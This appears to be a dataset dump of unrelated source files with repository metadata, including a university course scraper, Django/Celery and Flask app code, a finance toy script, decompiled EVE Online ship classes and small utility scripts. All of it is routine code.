table=BeautifulSoup(html,'lxml').find('table',attrs={'class':'collegePanel'}).find_all('a')
subjects={}
for item in table:
subjects[item.get_text()]='https://duapp2.drexel.edu'+item.get('href')
return subjects
class CourseInfor(threading.Thread):
def __init__(self,url,name):
super(CourseInfor,self).__init__()
self.url=url
self.name=name
def run(self):
statue=True
while statue:
try:
html=requests.get(self.url,headers=headers,timeout=30).text
statue=False
except:
continue
table=BeautifulSoup(html,'lxml').find('td',attrs={'align':'center'}).find('table').find_all('tr')
self.course_list=[]
courses=[]
for item in table[1:-1]:
course=self.subject_parser(item)
if course==False:
continue
courses.append(course)
for course in courses:
course=self.course_parser(course)
self.course_list.append(course)
print('------'+self.name+'--OK')
def course_parser(self,course):
statue=True
while statue:
try:
html=requests.get(course['url'],headers=headers,timeout=30).text
statue=False
except:
continue
soup=BeautifulSoup(html,'lxml').find('table',attrs={'align':'center','valign':'top'})
baseInforTable=soup.find('td',attrs={'align':'left'}).find_all('td',attrs={'align':'center'})
trs=baseInforTable[0].find_all('tr')
lists=['SubjectCode','CourseNumber','Section','Credits','Title','Campus','Instructors','Instruction_Type','Instruction_Method','Max_Enroll','Enroll','Section_Comments']
for num in range(len(lists)):
try:
course[lists[num]]=trs[num+1].find_all('td')[1].get_text()
except:
course[lists[num]]='--'
table=baseInforTable[1].find('tr',attrs={'class':'even'}).find_all('td')
course['Building']=table[-2].get_text()
course['Room']=table[-1].get_text()
subjectInforText=soup.find('td',attrs={'align':'center','valign':'top'}).get_text()
reText={'College':'College:([\s\S]*)Department','Restrictions':'Restrictions:([\s\S]*)Co-Requisites','Co-Requisites':'Co-Requisites:([\s\S]*)Pre-Requisites','Pre-Requisites':'Pre-Requisites:([\s\S]*)Repeat Status','Repeat Status':'Repeat Status:([\s\S]*)'}
for key in reText:
try:
course[key]=re.findall(reText[key],subjectInforText)[0]
except:
course[key]='--'
return course
def subject_parser(self,item):
course={}
try:
url='https://duapp2.drexel.edu'+item.find('a').get('href')
except:
return False
course['url']=url
course['CRN']=item.find('a').get_text()
course['Times']=item.find('table').get_text()
return course
def Get_Course(Quarter,college,subjects):
print(Quarter+'--'+college+'--Start')
excel=xlwt3.Workbook()
threadings=[]
for subject in subjects:
work=CourseInfor(subjects[subject], subject)
threadings.append(work)
for work in threadings:
work.setDaemon(True)
work.start()
for work in threadings:
work.join()
sheet=excel.add_sheet(college)
count=0
lists=['SubjectCode','CourseNumber','CRN','Section','Credits','Times','Title','Campus','Instructors','Instruction_Type'
,'Instruction_Method','Max_Enroll','Enroll','Section_Comments','Building','Room','College','Restrictions','Co-Requisites','Pre-Requisites','Repeat Status','url']
for work in threadings:
for course in work.course_list:
for num in range(len(lists)):
sheet.write(count,num,course[lists[num]])
count+=1
print(Quarter+'--'+college+'--OK')
excel.save(Quarter+'/'+college+'.xls')
def main():
quarter=Get_Quarter()
for key in quarter:
colleges=Get_College(quarter[key])
try:
os.mkdir(key)
except:
print('--')
excel=xlwt3.Workbook()
threadings=[]
for college in colleges:
subjects=Get_subjects(colleges[college])
work=threading.Thread(target=Get_Course,args=(key, college, subjects))
threadings.append(work)
for work in threadings:
work.setDaemon(True)
work.start()
for work in threadings:
work.join()
print('----------'+key+'--OK----------')
main()
| [
"2397955090@qq.com"
] | 2397955090@qq.com |
139bab4db8371e55144c6a767edd8121e9e1726d | 817f7dfb035af90b4c7f810c72eb7b407ea28c99 | /pingdumb/taskapp/celery.py | 7b13583c61674dfea5219ebd72f04285f69c7100 | [
"MIT"
] | permissive | rubythonode/pingdumb-django | bd7e361a7d6886db81d9bdad78ef62d375ad768a | 750a26f7c55eb176f6fd0f5b655751ee2d114d9e | refs/heads/master | 2021-01-12T01:51:18.192362 | 2016-12-14T04:50:42 | 2016-12-14T04:50:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,110 | py |
from __future__ import absolute_import
import os
from celery import Celery
from django.apps import apps, AppConfig
from django.conf import settings
if not settings.configured:
# set the default Django settings module for the 'celery' program.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'config.settings.local') # pragma: no cover
app = Celery('pingdumb')
class CeleryConfig(AppConfig):
name = 'pingdumb.taskapp'
verbose_name = 'Celery Config'
def ready(self):
# Using a string here means the worker will not have to
# pickle the object when using Windows.
app.config_from_object('django.conf:settings')
installed_apps = [app_config.name for app_config in apps.get_app_configs()]
app.autodiscover_tasks(lambda: installed_apps, force=True)
if hasattr(settings, 'RAVEN_CONFIG'):
# Celery signal registration
from raven import Client as RavenClient
from raven.contrib.celery import register_signal as raven_register_signal
from raven.contrib.celery import register_logger_signal as raven_register_logger_signal
raven_client = RavenClient(dsn=settings.RAVEN_CONFIG['DSN'])
raven_register_logger_signal(raven_client)
raven_register_signal(raven_client)
if hasattr(settings, 'OPBEAT'):
from opbeat.contrib.django.models import client as opbeat_client
from opbeat.contrib.django.models import logger as opbeat_logger
from opbeat.contrib.django.models import register_handlers as opbeat_register_handlers
from opbeat.contrib.celery import register_signal as opbeat_register_signal
try:
opbeat_register_signal(opbeat_client)
except Exception as e:
opbeat_logger.exception('Failed installing celery hook: %s' % e)
if 'opbeat.contrib.django' in settings.INSTALLED_APPS:
opbeat_register_handlers()
@app.task(bind=True)
def debug_task(self):
print('Request: {0!r}'.format(self.request)) # pragma: no cover
| [
"chm073@gmail.com"
] | chm073@gmail.com |
0eca868fb731e2726e52062354a6937d43dade2f | cc2bb9ccc66783ac7d37454e4784df5e4a2d80f4 | /close_server_one.py | 34b036b30e1c44c412f1356dfc39352cae3581da | [] | no_license | ronnyzh/Tornado_Server | f308b7e9c2112167b04cbe324e37b1f891999187 | 42112d39e4dea128d059dbfa53c410f3774dc4b1 | refs/heads/master | 2021-05-22T22:10:26.694262 | 2020-04-04T23:39:14 | 2020-04-04T23:39:14 | 253,118,839 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 393 | py | # -*- coding:utf-8 -*-
# !/bin/python
"""
Author: ronnyzh
Date: 2019/11/15
Revision: 1.0.0
Description: Description
"""
from model.model_redis import getInst
from define.define_redis_key import *
IP = '192.168.50.2'
PORT = '9797'
if __name__ == '__main__':
redis = getInst()
ipKey = Key_Server_Order % ('%s:%s' % (IP, PORT))
redis.lpush(ipKey, 'closeServer')
| [
"ronnyzh@yeah.net"
] | ronnyzh@yeah.net |
c336b550745a3945d4d397f07f31e0af46fe95d7 | 8517c5849cec02cfd52d5a20d8c5468227f60c0d | /kozmic/repos/views.py | 3504ff09546983cc581849ca6a165f7e6b3613e0 | [] | no_license | aromanovich/kozmic-ci | 87475a27c3b47f0e4f226aef9856b3f39ed911e5 | 368ceb992b7b9b6ceb099570f9291655cad9e96c | refs/heads/master | 2021-01-19T02:00:55.573742 | 2016-06-14T04:45:10 | 2016-06-14T04:45:10 | 14,984,166 | 26 | 6 | null | 2016-06-14T04:45:10 | 2013-12-06T14:03:31 | Python | UTF-8 | Python | false | false | 4,622 | py | import datetime
import logging
import collections
from flask import (current_app, flash, request, render_template, redirect,
url_for, abort)
from flask.ext.login import current_user
from kozmic import db
from kozmic.models import User, Organization, Project, DeployKey
from . import bp
logger = logging.getLogger(__name__)
@bp.route('/')
def index():
user_repositories = current_user.repositories.with_entities(
db.literal(current_user.gh_login).label('gh_owner_login'),
User.Repository.gh_id.label('gh_id'),
User.Repository.gh_full_name.label('gh_full_name'))
user_org_repositories = current_user.organizations.join(
Organization.Repository
).with_entities(
Organization.gh_login.label('gh_owner_login'),
Organization.Repository.gh_id.label('gh_id'),
Organization.Repository.gh_full_name.label('gh_full_name'),
)
repositories = user_repositories.union_all(user_org_repositories).subquery()
repositories_without_project = db.session.query(repositories).outerjoin(
Project, repositories.c.gh_id == Project.gh_id
).filter(Project.id == None).all()
repositories_by_owner = collections.defaultdict(list)
for gh_owner_login, gh_id, gh_full_name in repositories_without_project:
repositories_by_owner[gh_owner_login].append((gh_id, gh_full_name))
return render_template(
'repos/index.html', repositories_by_owner=repositories_by_owner)
@bp.route('/sync/')
def sync():
"""Updates the organizations and repositories to which
the user has admin access.
"""
# Delete all the old repositories and organizations
# (don't do batch delete to let ORM-level cascades work)
for repo in current_user.repositories:
db.session.delete(repo)
for org in current_user.organizations:
db.session.delete(org)
# Fill the user's organizations and their repositories
gh_orgs, gh_repos_by_org_id = current_user.get_gh_org_repos()
for gh_org in gh_orgs:
org = Organization(
gh_id=gh_org.id,
gh_login=gh_org.login,
gh_name=gh_org.name)
for gh_repo in gh_repos_by_org_id[gh_org.id]:
repo = Organization.Repository.from_gh_repo(gh_repo)
org.repositories.append(repo)
current_user.organizations.append(org)
# Fill the user's own repositories
for gh_repo in current_user.get_gh_repos():
repo = User.Repository.from_gh_repo(gh_repo)
current_user.repositories.append(repo)
current_user.repos_last_synchronized_at = datetime.datetime.utcnow()
db.session.commit()
return redirect(url_for('.index'))
@bp.route('/<int:gh_id>/on/', methods=('POST',))
def on(gh_id):
"""Creates :class:`app.models.Project` for GitHub repository
with `gh_id`.
"""
# First try to find the user's repository with `gh_id`
repo = (current_user.repositories
.filter(User.Repository.gh_id == gh_id).first())
# If not found, try to find such a repository among
# the user organizations' repositories
repo = repo or (current_user.organizations
.join(Organization.Repository)
.filter(Organization.Repository.gh_id == gh_id)
.with_entities(Organization.Repository).first())
if not repo:
abort(404)
if Project.query.filter_by(gh_id=repo.gh_id).first():
# If project for repository with `gh_id` already exists,
# we should show page where the user can ask for an invite
# to the existing project.
# For now just show 400
abort(400)
project = Project(
owner=current_user,
gh_id=repo.gh_id,
gh_name=repo.gh_name,
gh_full_name=repo.gh_full_name,
gh_login=repo.parent.gh_login,
gh_ssh_clone_url=repo.gh_ssh_clone_url,
gh_https_clone_url=repo.gh_https_clone_url,
is_public=repo.is_public)
db.session.add(project)
ok_to_commit = True
if not project.is_public:
project.deploy_key = DeployKey(passphrase=project.passphrase)
ok_to_commit = ok_to_commit and project.deploy_key.ensure()
ok_to_commit = ok_to_commit and project.sync_memberships_with_github()
if ok_to_commit:
db.session.commit()
return redirect(url_for('projects.settings', id=project.id))
else:
db.session.rollback()
flash('Sorry, failed to create a project. Please try again later.',
'warning')
return redirect(url_for('.index'))
| [
"anthony.romanovich@gmail.com"
] | anthony.romanovich@gmail.com |
945f3b5e2ce68a78a710408a838215d972d40c1a | 3740de0d6e43ea140fc09ab314e4c492603ba185 | /scripts/sources/s_generalized_flam_toy.py | 7cc7fd1ff125b384c9bb6a7535b3cfea5e5b6ec7 | [
"MIT"
] | permissive | s0ap/arpmRes | 29c60c65fd3e11be1cc31d46494e5b3ebf6e05ab | ddcc4de713b46e3e9dcb77cc08c502ce4df54f76 | refs/heads/master | 2022-02-16T05:01:22.118959 | 2019-08-20T16:45:02 | 2019-08-20T16:45:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,933 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.4'
# jupytext_version: 1.1.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # s_generalized_flam_toy [<img src="https://www.arpm.co/lab/icons/icon_permalink.png" width=30 height=30 style="display: inline;">](https://www.arpm.co/lab/redirect.php?code=s_generalized_flam_toy&codeLang=Python)
# For details, see [here](https://www.arpm.co/lab/redirect.php?permalink=s_generalized_flam_toy).
# +
import numpy as np
from arpym.statistics import objective_r2, simulate_normal
from arpym.tools import solve_riccati
# -
# ## [Input parameters](https://www.arpm.co/lab/redirect.php?permalink=s_generalized_flam_toy-parameters)
# +
sig2 = np.array
rho = 0.3
epsi = 0.45
s = np.array([[0.3], [0.1]])
w = np.array([[1], [-3]])
sig = 1
sig2 = np.array([[1, 0.5, epsi, epsi],
[0.5, 1, epsi, epsi],
[epsi, epsi, 1, rho],
[epsi, epsi, rho, 1]])
# -
# ## [Step 1](https://www.arpm.co/lab/redirect.php?permalink=s_generalized_flam_toy-implementation-step01): conditional expectation and covariance
# +
def cond_exp_x(s, k=2, sig2=sig2):
return sig2[:2, -k:] @ np.linalg.solve(sig2[-k:, -k:], s)
def cond_cov_x(k=2, sig2=sig2):
return sig2[:2, :2] - sig2[:2, -k:] @ np.linalg.solve(sig2[-k:, -k:],
sig2[:2, -k:].T)
cond_mu_x = cond_exp_x(s)
cond_sig2_x = cond_cov_x()
# -
# ## [Step 2](https://www.arpm.co/lab/redirect.php?permalink=s_generalized_flam_toy-implementation-step02): Max of cond. info ratio and combination at which is attained
w_sig = sig * np.linalg.solve(cond_sig2_x, cond_mu_x) / \
np.sqrt(cond_mu_x.T @ np.linalg.solve(cond_sig2_x, cond_mu_x))
max_ir = w_sig.T @ cond_mu_x / np.sqrt(w_sig.T @ cond_sig2_x @ w_sig)
# ## [Step 3](https://www.arpm.co/lab/redirect.php?permalink=s_generalized_flam_toy-implementation-step03): Max of cond. info ratio via flam and transfer coefficient
max_ir_flam = np.sqrt(cond_mu_x.T @ np.linalg.solve(cond_sig2_x,
cond_mu_x))
ir_arb = w.T @ cond_mu_x / np.sqrt(w.T @ cond_sig2_x @ w)
tc = ir_arb / max_ir_flam
# ## [Step 4](https://www.arpm.co/lab/redirect.php?permalink=s_generalized_flam_toy-implementation-step04): Max. unconditional info ratios
# +
def uncond_max_ir(k, sig2=sig2):
# Monte Carlo scenarios for the signals
s_j = simulate_normal(np.zeros((2)), sig2[-2:, -2:], 1000).T
cond_mu_x_j = cond_exp_x(s_j[:k, :], k, sig2)
# Monte Carlo scenarios for the conditioned max info ratio
max_ir_j = cond_mu_x_j.T @ \
np.linalg.solve(cond_cov_x(k, sig2),
cond_mu_x_j)
return np.sqrt(np.trace(max_ir_j) / 1000)
uncond_maxir_12 = uncond_max_ir(2)
uncond_maxir_1 = uncond_max_ir(1)
uncond_maxir_2 = uncond_max_ir(1)
print(uncond_maxir_12**2 - (uncond_maxir_1**2 + uncond_maxir_2**2))
# verify that (epsi << 1) implies weak signals
sig2_weak = np.array([[1, 0.5, 0.1, 0.1],
[0.5, 1, 0.1, 0.1],
[0.1, 0.1, 1, rho],
[0.1, 0.1, rho, 1]])
print(cond_cov_x(2, sig2_weak))
print(sig2[:2, :2])
# independent signals (rho = 0) and weak correlation (epsi << 1)
sig2_weak_ind = np.array([[1, 0.5, 0.1, 0.1],
[0.5, 1, 0.1, 0.1],
[0.1, 0.1, 1, 0],
[0.1, 0.1, 0, 1]])
maxir_12_weak_ind = uncond_max_ir(2, sig2_weak_ind)
maxir1_weak_ind = uncond_max_ir(1, sig2_weak_ind)
maxir2_weak_ind = uncond_max_ir(1, sig2_weak_ind)
print(maxir_12_weak_ind**2 - (maxir1_weak_ind**2 +
maxir2_weak_ind**2))
# -
# ## [Step 5](https://www.arpm.co/lab/redirect.php?permalink=s_generalized_flam_toy-implementation-step05): information coefficients
# +
def ic(k, sig2=sig2):
return np.sqrt(2 * objective_r2(np.arange(k), sig2, 2, sig2[:2, :2]))
ic_12 = ic(2)
ic_1 = ic(1)
ic_2 = ic(1)
print(ic_12**2 - (ic_1**2 + ic_2**2))
# independent signals (rho = 0)
sig2_ind = np.array([[1, 0.5, epsi, epsi],
[0.5, 1, epsi, epsi],
[epsi, epsi, 1, 0],
[epsi, epsi, 0, 1]])
ic_12_ind = ic(2, sig2_ind)
ic_1_ind = ic(1, sig2_ind)
ic_2_ind = ic(1, sig2_ind)
print(ic_12_ind**2 - (ic_1_ind**2 + ic_2_ind**2))
# -
# ## [Step 6](https://www.arpm.co/lab/redirect.php?permalink=s_generalized_flam_toy-implementation-step06): linkage matrix
# +
def linkage(sig2=sig2):
return np.linalg.solve(solve_riccati(sig2[:2, :2]),
np.linalg.solve(solve_riccati(sig2[2:, 2:]).T,
sig2[:2, 2:].T).T)
p_s_x = linkage(sig2)
# -
# ## [Step 7](https://www.arpm.co/lab/redirect.php?permalink=s_generalized_flam_toy-implementation-step07): Fundamental law of active management (weak signals)
# +
sig2_weak = np.array([[1, 0.5, 0.1, 0.1],
[0.5, 1, 0.1, 0.1],
[0.1, 0.1, 1, rho],
[0.1, 0.1, rho, 1]])
p_s_x_weak = linkage(sig2_weak_ind)
# information coefficient
ic_linkage = np.sqrt(np.trace(p_s_x_weak @ p_s_x_weak.T))
# max information ratio
s_tilde = np.linalg.solve(solve_riccati(sig2_weak[2:, 2:]), s)
maxir_linkage = uncond_max_ir(2, sig2=sig2_weak)
print(maxir_linkage**2 - ic_linkage**2)
# -
# ## [Step 8](https://www.arpm.co/lab/redirect.php?permalink=s_generalized_flam_toy-implementation-step08): Fundamental law of active management (weak and ind. signals)
# +
p_s_x_weak_ind = linkage(sig2_weak_ind)
# information coefficient (single signal)
ic_linkage_1 = np.sqrt(np.trace(p_s_x_weak[:, [0]] @ p_s_x_weak[:, [0]].T))
print(ic_linkage_1 * np.sqrt(2) - maxir_12_weak_ind)
| [
"dario.popadic@yahoo.com"
] | dario.popadic@yahoo.com |
34dadc42e9085d239b0e37efcf94d7e7460e7403 | 8fcc27160f8700be46296568260fa0017a0b3004 | /client/eve/client/script/environment/spaceObject/entityShip.py | 253efe958a9487e51db0b4662828ae06dbef0567 | [] | no_license | connoryang/dec-eve-serenity | 5d867f4eedfa896a4ef60f92556356cafd632c96 | b670aec7c8b4514fc47cd52e186d7ccf3aabb69e | refs/heads/master | 2021-01-22T06:33:16.303760 | 2016-03-16T15:15:32 | 2016-03-16T15:15:32 | 56,389,750 | 1 | 0 | null | 2016-04-16T15:05:24 | 2016-04-16T15:05:24 | null | UTF-8 | Python | false | false | 3,545 | py | #Embedded file name: e:\jenkins\workspace\client_SERENITY\branches\release\SERENITY\eve\client\script\environment\spaceObject\entityShip.py
import blue
import destiny
from eve.client.script.environment.spaceObject.spaceObject import SpaceObject
from eve.client.script.environment.spaceObject.ship import Ship
from eve.client.script.environment.model.turretSet import TurretSet
import eve.common.lib.appConst as const
import evetypes
class EntityShip(Ship):
launcherTypeCache = {}
def __init__(self):
Ship.__init__(self)
self.gfxTurretID = None
self.fitted = False
self.typeID = None
self.modules = {}
self.model = None
self.launcherTypeID = None
def LoadModel(self, fileName = None, loadedModel = None):
godma = self.sm.GetService('godma')
godmaStateManager = godma.GetStateManager()
godmaType = godmaStateManager.GetType(self.typeID)
self.turretTypeID = godmaType.gfxTurretID
missileTypeID = godmaType.entityMissileTypeID
self.launcherTypeID = self.DetermineLauncherTypeFromMissileID(self.typeID, missileTypeID)
SpaceObject.LoadModel(self)
def Assemble(self):
Ship.Assemble(self)
self.FitBoosters(isNPC=True)
self.SetupSharedAmbientAudio()
def DetermineLauncherTypeFromMissileID(self, typeID, missileTypeID):
launcherType = self.launcherTypeCache.get(missileTypeID, None)
if launcherType:
return launcherType
clientDogma = self.sm.GetService('clientDogmaStaticSvc')
usesMissiles = clientDogma.TypeHasEffect(typeID, const.effectMissileLaunchingForEntity)
if not usesMissiles:
return
godma = self.sm.GetService('godma')
group = int(godma.GetTypeAttribute2(missileTypeID, const.attributeLauncherGroup))
for typeID in evetypes.GetTypeIDsByGroup(group):
if typeID in cfg.invmetatypesByParent:
launcherType = typeID
self.launcherTypeCache[missileTypeID] = launcherType
break
return launcherType
def LookAtMe(self):
if self.model is None:
return
if not self.fitted:
self.FitHardpoints()
def FitHardpoints(self, blocking = False):
if self.model is None:
self.LogWarn('FitHardpoints - No model')
return
if self.fitted:
return
self.fitted = True
turretLocatorCount = int(self.model.GetTurretLocatorCount())
if self.launcherTypeID:
launcherSet = TurretSet.FitTurret(self.model, self.launcherTypeID, turretLocatorCount, count=1)
self.modules[0] = launcherSet
turretLocatorCount = max(turretLocatorCount - 1, 1)
newTurretSet = TurretSet.FitTurret(self.model, self.turretTypeID, -1, count=turretLocatorCount)
if newTurretSet is not None:
self.modules[self.id] = newTurretSet
def Release(self):
if self.released:
return
for turretPair in self.modules.itervalues():
if turretPair is not None:
turretPair.Release()
turretPair.owner = None
self.modules = {}
Ship.Release(self)
class EntitySleeper(EntityShip):
def FitHardpoints(self, blocking = False):
if self.launcherTypeID:
self.launcherTypeID = 0
EntityShip.FitHardpoints(self)
| [
"masaho.shiro@gmail.com"
] | masaho.shiro@gmail.com |
4498670807eaeaf54a06134d1ce03533c8bc8c45 | ca8167a83eaec916437c0fdd757a76bb0441a5a3 | /envs/dmlab/dmlab_populate_cache.py | 495f3a7c761a2d9edb2d33b8079a14dbf225b782 | [
"Apache-2.0"
] | permissive | Zhehui-Huang/scalable_agent | b470afe0130e95d2e63e521abd7bf61016e5e358 | 505909ad9f2d3e9bce8bb9201e05e780002428df | refs/heads/master | 2022-04-25T23:21:40.302551 | 2020-02-03T07:43:35 | 2020-02-03T07:43:35 | 257,515,137 | 0 | 0 | Apache-2.0 | 2020-04-21T07:33:26 | 2020-04-21T07:33:25 | null | UTF-8 | Python | false | false | 850 | py | import sys
from algorithms.utils.multi_env import MultiEnv
from envs.dmlab.dmlab_utils import DmlabGymEnv
from utils.utils import log
def main():
def make_env(env_config):
env = DmlabGymEnv('contributed/dmlab30/rooms_watermaze', 4)
return env
num_envs = 64
num_workers = 16
multi_env = MultiEnv(num_envs, num_workers, make_env, stats_episodes=100)
num_resets = 0
try:
while True:
multi_env.reset()
num_resets += 1
num_envs_generated = num_resets * num_envs
log.info('Generated %d environments...', num_envs_generated)
except (Exception, KeyboardInterrupt, SystemExit):
log.exception('Interrupt...')
finally:
log.info('Closing env...')
multi_env.close()
return 0
if __name__ == '__main__':
sys.exit(main())
| [
"petrenko@usc.edu"
] | petrenko@usc.edu |
70d21f0315e69b783a6c51389ee8a14057eec12e | ae08a53864b4ec19458eae7bdf072b91b489e595 | /nina-service/app/api/v1/users/messenger.py | d8808844ee411840587e5feb56cf0cb9c1f54339 | [] | no_license | OscarGibson/docker-messenger-test | aee90378691527fd4f7156c3b16490393a548e14 | f04c3d932818b16fa6a304e41ff5492a6d67ccb7 | refs/heads/master | 2022-12-09T07:49:10.324014 | 2018-09-12T07:04:20 | 2018-09-12T07:04:20 | 148,104,678 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 487 | py | import requests
class Messenger:
def __init__(self, receiver, *args, **kwargs):
self.receiver = receiver
self.headers = {
'content-type' : 'application/json',
}
def set_headers(self, request_object):
self.headers['Authorization'] = request_object.headers.get('Authorization')
def send(self, data= {}, method= 'get', params= ''):
# print("SENFING: ", self.receiver % params)
return getattr(requests, method)(self.receiver % params, json= data, headers= self.headers) | [
"user@users-MacBook-Pro.local"
] | user@users-MacBook-Pro.local |
1da694b5ea387596423c38640e879d0c7a989f94 | 4142b8c513d87361da196631f7edd82f11465abb | /python/round481/978C.py | 507c51c1f9c84ef6c7c7bff283409bd7ae7ba262 | [] | no_license | npkhanhh/codeforces | b52b66780426682ea1a3d72c66aedbe6dc71d7fe | 107acd623b0e99ef0a635dfce3e87041347e36df | refs/heads/master | 2022-02-08T17:01:01.731524 | 2022-02-07T10:29:52 | 2022-02-07T10:29:52 | 228,027,631 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 423 | py | from sys import stdin
import bisect
n, m = list(map(int, stdin.readline().split()))
a = list(map(int, stdin.readline().split()))
b = list(map(int, stdin.readline().split()))
p_a = [0]*n
p_a[0] = a[0]
for i in range(1, n):
p_a[i] = a[i] + p_a[i-1]
p_a = [0]+p_a
for i in b:
dorm = bisect.bisect(p_a, i)
room = i - p_a[dorm-1]
if room == 0:
dorm -= 1
room = a[dorm-1]
print(dorm, room)
| [
"npkhanh93@gmail.com"
] | npkhanh93@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.